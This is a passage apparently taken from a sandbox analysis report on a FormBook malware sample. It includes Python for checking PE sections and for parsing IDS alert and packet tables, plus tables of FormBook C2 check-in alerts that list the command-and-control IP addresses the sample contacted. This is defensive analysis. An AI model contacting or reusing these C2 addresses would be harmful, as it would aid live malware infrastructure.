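        if s.vsize > s.rawsize and "WRITE" not in s.chars:
            # .bss-style growth is normal for a writable section, odd elsewhere
            findings.append(f"{s.name}: virtual size exceeds raw size in a read-only section")
        if "EXECUTE" in s.chars and "WRITE" in s.chars:
            findings.append(f"{s.name}: writable and executable")
    ep = section_for_rva(ENTRY_POINT - IMAGE_BASE)
    if ep is None or "EXECUTE" not in ep.chars:
        findings.append("entry point outside an executable section")
    return findings


def rcdata_share():
    """Fraction of the resource directory occupied by the single RT_RCDATA blob."""
    return RCDATA_SIZE / RESOURCE_DIR_SIZE


if __name__ == "__main__":
    print("entry point in", entry_point_section())
    print("directory mismatches:", directory_mismatches())
    for f in section_findings():
        print("finding:", f)
    print(f"RT_RCDATA share of .rsrc: {rcdata_share():.0%}")
```

For this sample every check passes except the entropy flag on .rsrc, and the RT_RCDATA entry accounts for about 91% of the resource directory. Read together with the report's "Binary is likely a compiled AutoIt script file" signature, that is the profile of an unpacked Aut2Exe stub: the executable itself is plain VS2008/VS2012 code, and the payload is the compressed script carried in the resources, which is where an unpacker should start. That mapping from the RCDATA blob to the script is an inference from the numbers; the report lists neither resource names nor the script itself, and the FormBook behaviour it flags appears only once the script runs.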
                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                2024-11-27T08:53:45.960450+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.649777161.97.168.24580TCP
                                                                2024-11-27T08:53:45.960450+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.649777161.97.168.24580TCP
                                                                2024-11-27T08:54:03.235909+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.64981927.124.4.24680TCP
                                                                2024-11-27T08:54:05.907848+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.64982427.124.4.24680TCP
                                                                2024-11-27T08:54:08.595417+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.64983127.124.4.24680TCP
                                                                2024-11-27T08:54:11.282791+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.64983827.124.4.24680TCP
                                                                2024-11-27T08:54:11.282791+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.64983827.124.4.24680TCP
                                                                2024-11-27T08:54:19.223732+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649858149.88.81.19080TCP
                                                                2024-11-27T08:54:21.892239+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649865149.88.81.19080TCP
                                                                2024-11-27T08:54:24.564197+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649872149.88.81.19080TCP
                                                                2024-11-27T08:54:47.655968+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.649878149.88.81.19080TCP
                                                                2024-11-27T08:54:47.655968+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.649878149.88.81.19080TCP
                                                                2024-11-27T08:54:55.411834+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.64994485.159.66.9380TCP
                                                                2024-11-27T08:54:58.079931+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.64995085.159.66.9380TCP
                                                                2024-11-27T08:55:00.751872+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.64995885.159.66.9380TCP
                                                                2024-11-27T08:55:03.326014+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.64996685.159.66.9380TCP
                                                                2024-11-27T08:55:03.326014+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.64996685.159.66.9380TCP
                                                                2024-11-27T08:55:10.226446+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649983185.27.134.14480TCP
                                                                2024-11-27T08:55:12.937312+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649990185.27.134.14480TCP
                                                                2024-11-27T08:55:15.611282+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649997185.27.134.14480TCP
                                                                2024-11-27T08:55:18.327397+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.650003185.27.134.14480TCP
                                                                2024-11-27T08:55:18.327397+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.650003185.27.134.14480TCP
                                                                2024-11-27T08:55:25.329251+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650006172.67.145.23480TCP
                                                                2024-11-27T08:55:28.178587+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650007172.67.145.23480TCP
                                                                2024-11-27T08:55:30.870401+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650008172.67.145.23480TCP
                                                                2024-11-27T08:55:33.466810+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.650009172.67.145.23480TCP
                                                                2024-11-27T08:55:33.466810+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.650009172.67.145.23480TCP
                                                                2024-11-27T08:55:40.464204+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650010172.67.167.14680TCP
                                                                2024-11-27T08:55:43.124581+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650011172.67.167.14680TCP
                                                                2024-11-27T08:55:45.948010+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650012172.67.167.14680TCP
                                                                2024-11-27T08:55:48.702630+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.650013172.67.167.14680TCP
                                                                2024-11-27T08:55:48.702630+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.650013172.67.167.14680TCP
                                                                2024-11-27T08:55:55.802009+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650014154.88.22.10180TCP
                                                                2024-11-27T08:55:58.471009+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650015154.88.22.10180TCP
                                                                2024-11-27T08:56:01.142486+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650016154.88.22.10180TCP
                                                                2024-11-27T08:56:03.874999+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.650017154.88.22.10180TCP
                                                                2024-11-27T08:56:03.874999+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.650017154.88.22.10180TCP
                                                                2024-11-27T08:56:10.717750+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650019209.74.77.10780TCP
                                                                2024-11-27T08:56:13.425645+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650020209.74.77.10780TCP
                                                                2024-11-27T08:56:16.168443+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650021209.74.77.10780TCP
                                                                2024-11-27T08:56:18.770935+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.650022209.74.77.10780TCP
                                                                2024-11-27T08:56:18.770935+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.650022209.74.77.10780TCP
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-27T08:56:34.006573+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50023 | 104.21.34.103 | 80 | TCP
2024-11-27T08:56:36.721112+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50025 | 104.21.34.103 | 80 | TCP
2024-11-27T08:56:39.338499+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50026 | 104.21.34.103 | 80 | TCP
2024-11-27T08:56:42.065647+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.6 | 50027 | 104.21.34.103 | 80 | TCP
2024-11-27T08:56:42.065647+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 50027 | 104.21.34.103 | 80 | TCP
2024-11-27T08:56:51.697619+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50028 | 20.2.249.7 | 80 | TCP
2024-11-27T08:56:54.376808+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50029 | 20.2.249.7 | 80 | TCP
2024-11-27T08:56:57.065492+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50030 | 20.2.249.7 | 80 | TCP
2024-11-27T08:56:59.824152+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.6 | 50031 | 20.2.249.7 | 80 | TCP
2024-11-27T08:56:59.824152+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 50031 | 20.2.249.7 | 80 | TCP
2024-11-27T08:57:07.048896+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50032 | 156.251.17.224 | 80 | TCP
2024-11-27T08:57:09.720988+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50033 | 156.251.17.224 | 80 | TCP
2024-11-27T08:57:12.400972+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50034 | 156.251.17.224 | 80 | TCP
2024-11-27T08:57:16.023931+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.6 | 50035 | 156.251.17.224 | 80 | TCP
2024-11-27T08:57:16.023931+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 50035 | 156.251.17.224 | 80 | TCP
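The alert rows above and the TCP rows below are rendered without column separators, so the IP and port fields run together. As an added example (not part of the Joe Sandbox report or its tooling), the following Python splits them back into fields and summarises what the tables show: per flagged destination the sequence of check-in requests (the two GET signatures, 2050745 and 2855465, fire on the same request and are counted once by grouping on the source port), and per remote host the number of TCP connections the sample opened. The sandbox address 192.168.2.6 and the set of remote service ports are assumptions used as parse anchors; the sample input is copied from this page.

```python
import re
from collections import defaultdict

# Sandbox VM address, present in every row of this report; it is the parse
# anchor because the flattened rows carry no separators (assumption: constant).
LOCAL_IP = "192.168.2.6"
IP = r"\d{1,3}(?:\.\d{1,3}){3}"
# Remote service ports expected on this page (assumption). Without a fixed port
# set the IP/port boundary in e.g. "156.251.17.22480TCP" is ambiguous.
SVC = r"8080|443|80"

ALERT_RE = re.compile(
    r"(?P<ts>\d{4}-\d\d-\d\dT\d\d:\d\d:\d\d\.\d+[+-]\d{4})(?P<sid>\d{7})"
    r"(?P<sig>.+?)(?P<sev>[1-4])" + re.escape(LOCAL_IP) +
    r"(?P<sport>\d{5})(?P<dst>" + IP + r")(?P<dport>" + SVC + r")(?P<proto>TCP|UDP)")
# Packet rows run "timestamp, src port, dst port, src IP, dst IP" together; an
# outbound row starts with the 5-digit ephemeral port, an inbound row with the service port.
PKT_OUT_RE = re.compile(r"(?P<ts>.+? CET)(?P<sport>\d{5})(?:" + SVC + r")"
                        + re.escape(LOCAL_IP) + r"(?P<remote>" + IP + r")")
PKT_IN_RE = re.compile(r"(?P<ts>.+? CET)(?:" + SVC + r")(?P<sport>\d{5})"
                       r"(?P<remote>" + IP + r")" + re.escape(LOCAL_IP))

# Constructed input: the IDS alert rows of this report, copied as flattened.
ALERT_ROWS = """\
2024-11-27T08:56:34.006573+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650023104.21.34.10380TCP
2024-11-27T08:56:36.721112+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650025104.21.34.10380TCP
2024-11-27T08:56:39.338499+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650026104.21.34.10380TCP
2024-11-27T08:56:42.065647+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.650027104.21.34.10380TCP
2024-11-27T08:56:42.065647+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.650027104.21.34.10380TCP
2024-11-27T08:56:51.697619+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65002820.2.249.780TCP
2024-11-27T08:56:54.376808+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65002920.2.249.780TCP
2024-11-27T08:56:57.065492+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65003020.2.249.780TCP
2024-11-27T08:56:59.824152+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.65003120.2.249.780TCP
2024-11-27T08:56:59.824152+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.65003120.2.249.780TCP
2024-11-27T08:57:07.048896+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650032156.251.17.22480TCP
2024-11-27T08:57:09.720988+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650033156.251.17.22480TCP
2024-11-27T08:57:12.400972+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650034156.251.17.22480TCP
2024-11-27T08:57:16.023931+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.650035156.251.17.22480TCP
2024-11-27T08:57:16.023931+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.650035156.251.17.22480TCP
"""
# Constructed input: the first packets of three connections from the report's TCP table.
PACKET_ROWS = """\
Nov 27, 2024 08:53:44.592991114 CET4977780192.168.2.6161.97.168.245
Nov 27, 2024 08:53:44.712991953 CET8049777161.97.168.245192.168.2.6
Nov 27, 2024 08:53:44.713099957 CET4977780192.168.2.6161.97.168.245
Nov 27, 2024 08:54:01.706984043 CET4981980192.168.2.627.124.4.246
Nov 27, 2024 08:54:01.826987028 CET804981927.124.4.246192.168.2.6
Nov 27, 2024 08:54:04.381131887 CET4982480192.168.2.627.124.4.246
Nov 27, 2024 08:54:04.501040936 CET804982427.124.4.246192.168.2.6
"""

def parse_alerts(text):
    """Split each flattened alert row into fields; the HTTP verb comes from the signature name."""
    rows = []
    for line in text.strip().splitlines():
        m = ALERT_RE.fullmatch(line.strip())
        if m is None:
            raise ValueError(f"unparsable alert row: {line!r}")
        d = m.groupdict()
        verb = re.search(r"\((GET|POST)\)", d["sig"])
        d["method"] = verb.group(1) if verb else None
        rows.append(d)
    return rows

def c2_checkin_pattern(alerts):
    """Per destination IP: the verb of each connection (keyed by source port, so two
    signatures firing on the same request count once) and the SIDs that fired."""
    per_dst = defaultdict(lambda: {"conns": {}, "sids": set()})
    for a in alerts:
        per_dst[a["dst"]]["conns"].setdefault(int(a["sport"]), a["method"])
        per_dst[a["dst"]]["sids"].add(int(a["sid"]))
    return {dst: {"methods": [v for _, v in sorted(e["conns"].items())],
                  "sids": sorted(e["sids"])} for dst, e in per_dst.items()}

def connections(text):
    """Group packet rows into TCP connections keyed by (local port, remote IP) and count
    packets per direction; returns (per-connection counts, connections per remote host)."""
    conns = defaultdict(lambda: {"out": 0, "in": 0})
    for line in text.strip().splitlines():
        line = line.strip()
        if (m := PKT_OUT_RE.fullmatch(line)) is not None:
            conns[(int(m["sport"]), m["remote"])]["out"] += 1
        elif (m := PKT_IN_RE.fullmatch(line)) is not None:
            conns[(int(m["sport"]), m["remote"])]["in"] += 1
        else:
            raise ValueError(f"unparsable packet row: {line!r}")
    per_remote = defaultdict(int)
    for _, remote in conns:
        per_remote[remote] += 1
    return dict(conns), dict(per_remote)

if __name__ == "__main__":
    for dst, e in c2_checkin_pattern(parse_alerts(ALERT_ROWS)).items():
        print(f"{dst:16} {' '.join(e['methods']):22} sids={e['sids']}")
    print(connections(PACKET_ROWS)[1])
```

Run stand-alone it prints, for each of the three flagged hosts, the same three-POST-then-GET sequence and the same three SIDs, which is the check-in cadence the alert table records as it moves from 104.21.34.103 to 20.2.249.7 to 156.251.17.224; the connection counts come from the sample packet rows only, so extend `PACKET_ROWS` with the rest of the table to profile every remote host the sample contacted.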
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 27, 2024 08:53:44.592991114 CET | 49777 | 80 | 192.168.2.6 | 161.97.168.245
Nov 27, 2024 08:53:44.712991953 CET | 80 | 49777 | 161.97.168.245 | 192.168.2.6
Nov 27, 2024 08:53:44.713099957 CET | 49777 | 80 | 192.168.2.6 | 161.97.168.245
Nov 27, 2024 08:53:44.728030920 CET | 49777 | 80 | 192.168.2.6 | 161.97.168.245
Nov 27, 2024 08:53:44.847989082 CET | 80 | 49777 | 161.97.168.245 | 192.168.2.6
Nov 27, 2024 08:53:45.960243940 CET | 80 | 49777 | 161.97.168.245 | 192.168.2.6
Nov 27, 2024 08:53:45.960347891 CET | 80 | 49777 | 161.97.168.245 | 192.168.2.6
Nov 27, 2024 08:53:45.960359097 CET | 80 | 49777 | 161.97.168.245 | 192.168.2.6
Nov 27, 2024 08:53:45.960370064 CET | 80 | 49777 | 161.97.168.245 | 192.168.2.6
Nov 27, 2024 08:53:45.960449934 CET | 49777 | 80 | 192.168.2.6 | 161.97.168.245
Nov 27, 2024 08:53:45.960453033 CET | 80 | 49777 | 161.97.168.245 | 192.168.2.6
Nov 27, 2024 08:53:45.960485935 CET | 49777 | 80 | 192.168.2.6 | 161.97.168.245
Nov 27, 2024 08:53:45.960485935 CET | 49777 | 80 | 192.168.2.6 | 161.97.168.245
Nov 27, 2024 08:53:45.965959072 CET | 49777 | 80 | 192.168.2.6 | 161.97.168.245
Nov 27, 2024 08:53:46.176646948 CET | 80 | 49777 | 161.97.168.245 | 192.168.2.6
Nov 27, 2024 08:54:01.706984043 CET | 49819 | 80 | 192.168.2.6 | 27.124.4.246
Nov 27, 2024 08:54:01.826987028 CET | 80 | 49819 | 27.124.4.246 | 192.168.2.6
Nov 27, 2024 08:54:01.827074051 CET | 49819 | 80 | 192.168.2.6 | 27.124.4.246
Nov 27, 2024 08:54:01.844566107 CET | 49819 | 80 | 192.168.2.6 | 27.124.4.246
Nov 27, 2024 08:54:01.964602947 CET | 80 | 49819 | 27.124.4.246 | 192.168.2.6
Nov 27, 2024 08:54:03.190831900 CET | 80 | 49819 | 27.124.4.246 | 192.168.2.6
Nov 27, 2024 08:54:03.235908985 CET | 49819 | 80 | 192.168.2.6 | 27.124.4.246
Nov 27, 2024 08:54:03.360940933 CET | 49819 | 80 | 192.168.2.6 | 27.124.4.246
Nov 27, 2024 08:54:03.383091927 CET | 80 | 49819 | 27.124.4.246 | 192.168.2.6
Nov 27, 2024 08:54:03.383177996 CET | 49819 | 80 | 192.168.2.6 | 27.124.4.246
Nov 27, 2024 08:54:04.381131887 CET | 49824 | 80 | 192.168.2.6 | 27.124.4.246
Nov 27, 2024 08:54:04.501040936 CET | 80 | 49824 | 27.124.4.246 | 192.168.2.6
Nov 27, 2024 08:54:04.501136065 CET | 49824 | 80 | 192.168.2.6 | 27.124.4.246
Nov 27, 2024 08:54:04.517178059 CET | 49824 | 80 | 192.168.2.6 | 27.124.4.246
Nov 27, 2024 08:54:04.637198925 CET | 80 | 49824 | 27.124.4.246 | 192.168.2.6
Nov 27, 2024 08:54:05.865360975 CET | 80 | 49824 | 27.124.4.246 | 192.168.2.6
Nov 27, 2024 08:54:05.907847881 CET | 49824 | 80 | 192.168.2.6 | 27.124.4.246
Nov 27, 2024 08:54:06.032901049 CET | 49824 | 80 | 192.168.2.6 | 27.124.4.246
Nov 27, 2024 08:54:06.057730913 CET | 80 | 49824 | 27.124.4.246 | 192.168.2.6
Nov 27, 2024 08:54:06.059375048 CET | 49824 | 80 | 192.168.2.6 | 27.124.4.246
Nov 27, 2024 08:54:07.052799940 CET | 49831 | 80 | 192.168.2.6 | 27.124.4.246
Nov 27, 2024 08:54:07.172790051 CET | 80 | 49831 | 27.124.4.246 | 192.168.2.6
Nov 27, 2024 08:54:07.172935009 CET | 49831 | 80 | 192.168.2.6 | 27.124.4.246
Nov 27, 2024 08:54:07.195000887 CET | 49831 | 80 | 192.168.2.6 | 27.124.4.246
Nov 27, 2024 08:54:07.314953089 CET | 80 | 49831 | 27.124.4.246 | 192.168.2.6
Nov 27, 2024 08:54:07.315009117 CET | 80 | 49831 | 27.124.4.246 | 192.168.2.6
Nov 27, 2024 08:54:08.549874067 CET | 80 | 49831 | 27.124.4.246 | 192.168.2.6
Nov 27, 2024 08:54:08.595417023 CET | 49831 | 80 | 192.168.2.6 | 27.124.4.246
Nov 27, 2024 08:54:08.704772949 CET | 49831 | 80 | 192.168.2.6 | 27.124.4.246
Nov 27, 2024 08:54:08.729079962 CET | 80 | 49831 | 27.124.4.246 | 192.168.2.6
Nov 27, 2024 08:54:08.729171038 CET | 49831 | 80 | 192.168.2.6 | 27.124.4.246
Nov 27, 2024 08:54:09.723958015 CET | 49838 | 80 | 192.168.2.6 | 27.124.4.246
Nov 27, 2024 08:54:09.843899012 CET | 80 | 49838 | 27.124.4.246 | 192.168.2.6
Nov 27, 2024 08:54:09.844099045 CET | 49838 | 80 | 192.168.2.6 | 27.124.4.246
Nov 27, 2024 08:54:09.854370117 CET | 49838 | 80 | 192.168.2.6 | 27.124.4.246
Nov 27, 2024 08:54:09.974365950 CET | 80 | 49838 | 27.124.4.246 | 192.168.2.6
Nov 27, 2024 08:54:11.242377996 CET | 80 | 49838 | 27.124.4.246 | 192.168.2.6
Nov 27, 2024 08:54:11.282790899 CET | 49838 | 80 | 192.168.2.6 | 27.124.4.246
Nov 27, 2024 08:54:11.443891048 CET | 80 | 49838 | 27.124.4.246 | 192.168.2.6
Nov 27, 2024 08:54:11.444046021 CET | 49838 | 80 | 192.168.2.6 | 27.124.4.246
Nov 27, 2024 08:54:11.444958925 CET | 49838 | 80 | 192.168.2.6 | 27.124.4.246
Nov 27, 2024 08:54:11.564827919 CET | 80 | 49838 | 27.124.4.246 | 192.168.2.6
Nov 27, 2024 08:54:17.570583105 CET | 49858 | 80 | 192.168.2.6 | 149.88.81.190
Nov 27, 2024 08:54:17.690583944 CET | 80 | 49858 | 149.88.81.190 | 192.168.2.6
Nov 27, 2024 08:54:17.690746069 CET | 49858 | 80 | 192.168.2.6 | 149.88.81.190
Nov 27, 2024 08:54:17.709693909 CET | 49858 | 80 | 192.168.2.6 | 149.88.81.190
Nov 27, 2024 08:54:17.829786062 CET | 80 | 49858 | 149.88.81.190 | 192.168.2.6
Nov 27, 2024 08:54:19.223731995 CET | 49858 | 80 | 192.168.2.6 | 149.88.81.190
Nov 27, 2024 08:54:19.384321928 CET | 80 | 49858 | 149.88.81.190 | 192.168.2.6
Nov 27, 2024 08:54:20.239805937 CET | 49865 | 80 | 192.168.2.6 | 149.88.81.190
Nov 27, 2024 08:54:20.359766006 CET | 80 | 49865 | 149.88.81.190 | 192.168.2.6
Nov 27, 2024 08:54:20.359888077 CET | 49865 | 80 | 192.168.2.6 | 149.88.81.190
Nov 27, 2024 08:54:20.384290934 CET | 49865 | 80 | 192.168.2.6 | 149.88.81.190
Nov 27, 2024 08:54:20.504190922 CET | 80 | 49865 | 149.88.81.190 | 192.168.2.6
Nov 27, 2024 08:54:21.892239094 CET | 49865 | 80 | 192.168.2.6 | 149.88.81.190
Nov 27, 2024 08:54:22.052341938 CET | 80 | 49865 | 149.88.81.190 | 192.168.2.6
Nov 27, 2024 08:54:22.911309004 CET | 49872 | 80 | 192.168.2.6 | 149.88.81.190
Nov 27, 2024 08:54:23.031177998 CET | 80 | 49872 | 149.88.81.190 | 192.168.2.6
Nov 27, 2024 08:54:23.031254053 CET | 49872 | 80 | 192.168.2.6 | 149.88.81.190
Nov 27, 2024 08:54:23.048840046 CET | 49872 | 80 | 192.168.2.6 | 149.88.81.190
Nov 27, 2024 08:54:23.168849945 CET | 80 | 49872 | 149.88.81.190 | 192.168.2.6
Nov 27, 2024 08:54:23.168948889 CET | 80 | 49872 | 149.88.81.190 | 192.168.2.6
Nov 27, 2024 08:54:24.564197063 CET | 49872 | 80 | 192.168.2.6 | 149.88.81.190
Nov 27, 2024 08:54:24.728452921 CET | 80 | 49872 | 149.88.81.190 | 192.168.2.6
Nov 27, 2024 08:54:25.583220959 CET | 49878 | 80 | 192.168.2.6 | 149.88.81.190
Nov 27, 2024 08:54:25.703959942 CET | 80 | 49878 | 149.88.81.190 | 192.168.2.6
Nov 27, 2024 08:54:25.705960989 CET | 49878 | 80 | 192.168.2.6 | 149.88.81.190
Nov 27, 2024 08:54:25.716041088 CET | 49878 | 80 | 192.168.2.6 | 149.88.81.190
Nov 27, 2024 08:54:25.836002111 CET | 80 | 49878 | 149.88.81.190 | 192.168.2.6
Nov 27, 2024 08:54:39.670140982 CET | 80 | 49858 | 149.88.81.190 | 192.168.2.6
Nov 27, 2024 08:54:39.670229912 CET | 49858 | 80 | 192.168.2.6 | 149.88.81.190
Nov 27, 2024 08:54:42.342247009 CET | 80 | 49865 | 149.88.81.190 | 192.168.2.6
Nov 27, 2024 08:54:42.342318058 CET | 49865 | 80 | 192.168.2.6 | 149.88.81.190
Nov 27, 2024 08:54:44.982881069 CET | 80 | 49872 | 149.88.81.190 | 192.168.2.6
Nov 27, 2024 08:54:44.982944965 CET | 49872 | 80 | 192.168.2.6 | 149.88.81.190
Nov 27, 2024 08:54:47.654768944 CET | 80 | 49878 | 149.88.81.190 | 192.168.2.6
Nov 27, 2024 08:54:47.655967951 CET | 49878 | 80 | 192.168.2.6 | 149.88.81.190
Nov 27, 2024 08:54:47.656785965 CET | 49878 | 80 | 192.168.2.6 | 149.88.81.190
Nov 27, 2024 08:54:47.776652098 CET | 80 | 49878 | 149.88.81.190 | 192.168.2.6
Nov 27, 2024 08:54:53.755791903 CET | 49944 | 80 | 192.168.2.6 | 85.159.66.93
Nov 27, 2024 08:54:53.875852108 CET | 80 | 49944 | 85.159.66.93 | 192.168.2.6
Nov 27, 2024 08:54:53.879910946 CET | 49944 | 80 | 192.168.2.6 | 85.159.66.93
Nov 27, 2024 08:54:53.895574093 CET | 49944 | 80 | 192.168.2.6 | 85.159.66.93
Nov 27, 2024 08:54:54.016257048 CET | 80 | 49944 | 85.159.66.93 | 192.168.2.6
Nov 27, 2024 08:54:55.411834002 CET | 49944 | 80 | 192.168.2.6 | 85.159.66.93
Nov 27, 2024 08:54:55.532154083 CET | 80 | 49944 | 85.159.66.93 | 192.168.2.6
Nov 27, 2024 08:54:55.536609888 CET | 49944 | 80 | 192.168.2.6 | 85.159.66.93
Nov 27, 2024 08:54:56.427891016 CET | 49950 | 80 | 192.168.2.6 | 85.159.66.93
Nov 27, 2024 08:54:56.548105001 CET | 80 | 49950 | 85.159.66.93 | 192.168.2.6
Nov 27, 2024 08:54:56.548214912 CET | 49950 | 80 | 192.168.2.6 | 85.159.66.93
Nov 27, 2024 08:54:56.577236891 CET | 49950 | 80 | 192.168.2.6 | 85.159.66.93
Nov 27, 2024 08:54:56.697145939 CET | 80 | 49950 | 85.159.66.93 | 192.168.2.6
Nov 27, 2024 08:54:58.079931021 CET | 49950 | 80 | 192.168.2.6 | 85.159.66.93
Nov 27, 2024 08:54:58.200289011 CET | 80 | 49950 | 85.159.66.93 | 192.168.2.6
Nov 27, 2024 08:54:58.203887939 CET | 49950 | 80 | 192.168.2.6 | 85.159.66.93
Nov 27, 2024 08:54:59.098848104 CET | 49958 | 80 | 192.168.2.6 | 85.159.66.93
Nov 27, 2024 08:54:59.218873978 CET | 80 | 49958 | 85.159.66.93 | 192.168.2.6
Nov 27, 2024 08:54:59.218966007 CET | 49958 | 80 | 192.168.2.6 | 85.159.66.93
Nov 27, 2024 08:54:59.237972975 CET | 49958 | 80 | 192.168.2.6 | 85.159.66.93
Nov 27, 2024 08:54:59.358009100 CET | 80 | 49958 | 85.159.66.93 | 192.168.2.6
Nov 27, 2024 08:54:59.358043909 CET | 80 | 49958 | 85.159.66.93 | 192.168.2.6
Nov 27, 2024 08:55:00.751872063 CET | 49958 | 80 | 192.168.2.6 | 85.159.66.93
Nov 27, 2024 08:55:00.872155905 CET | 80 | 49958 | 85.159.66.93 | 192.168.2.6
Nov 27, 2024 08:55:00.872205973 CET | 49958 | 80 | 192.168.2.6 | 85.159.66.93
Nov 27, 2024 08:55:01.771801949 CET | 49966 | 80 | 192.168.2.6 | 85.159.66.93
Nov 27, 2024 08:55:01.891805887 CET | 80 | 49966 | 85.159.66.93 | 192.168.2.6
Nov 27, 2024 08:55:01.892184019 CET | 49966 | 80 | 192.168.2.6 | 85.159.66.93
Nov 27, 2024 08:55:01.903806925 CET | 49966 | 80 | 192.168.2.6 | 85.159.66.93
Nov 27, 2024 08:55:02.023916960 CET | 80 | 49966 | 85.159.66.93 | 192.168.2.6
Nov 27, 2024 08:55:03.325696945 CET | 80 | 49966 | 85.159.66.93 | 192.168.2.6
Nov 27, 2024 08:55:03.325833082 CET | 80 | 49966 | 85.159.66.93 | 192.168.2.6
Nov 27, 2024 08:55:03.326014042 CET | 49966 | 80 | 192.168.2.6 | 85.159.66.93
Nov 27, 2024 08:55:03.328674078 CET | 49966 | 80 | 192.168.2.6 | 85.159.66.93
Nov 27, 2024 08:55:03.448554993 CET | 80 | 49966 | 85.159.66.93 | 192.168.2.6
Nov 27, 2024 08:55:08.856110096 CET | 49983 | 80 | 192.168.2.6 | 185.27.134.144
Nov 27, 2024 08:55:08.976085901 CET | 80 | 49983 | 185.27.134.144 | 192.168.2.6
Nov 27, 2024 08:55:08.976191998 CET | 49983 | 80 | 192.168.2.6 | 185.27.134.144
